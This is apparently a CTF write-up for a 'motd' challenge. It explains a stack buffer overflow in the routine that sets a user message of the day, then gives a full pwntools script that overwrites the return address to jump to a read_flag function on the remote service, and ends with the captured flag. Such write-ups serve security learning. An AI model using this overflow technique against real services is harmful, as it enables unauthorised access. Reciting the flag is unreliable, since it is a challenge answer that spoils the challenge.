
My solutions for various CTF challenges

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From the OffHub router, you jump onto the Google-Haus smart hub. This fully feature assistant of the future that uses machine learning on the blockchain to control all our IoT devices promises it all. It delivers the ability to print a Message-of-the-day. The rest is available as a premium subscription service paid monthly.

$ nc motd.ctfcompetition.com 1337


The binary lets you get and set a user and admin MOTD, but you are not allowed to read the admin MOTD unless you are root. When inspecting the function, it calls a function called read_flag, so we just have to jump there.

Set a new user MOTD with option 2, overflow the buffer and control the RIP to jump to the read_flag function and it prints out the flag.

Exploit script:

from pwn import *

e = ELF('motd')

# p = process('motd')
p = remote('motd.ctfcompetition.com', 1337)

p.recvuntil(': ')
p.recvuntil(': ')
p.sendline('A' * 264 + p64(e.symbols['read_flag']))

print p.recvall()

flag: CTF{m07d_1s_r3t_2_r34d_fl4g}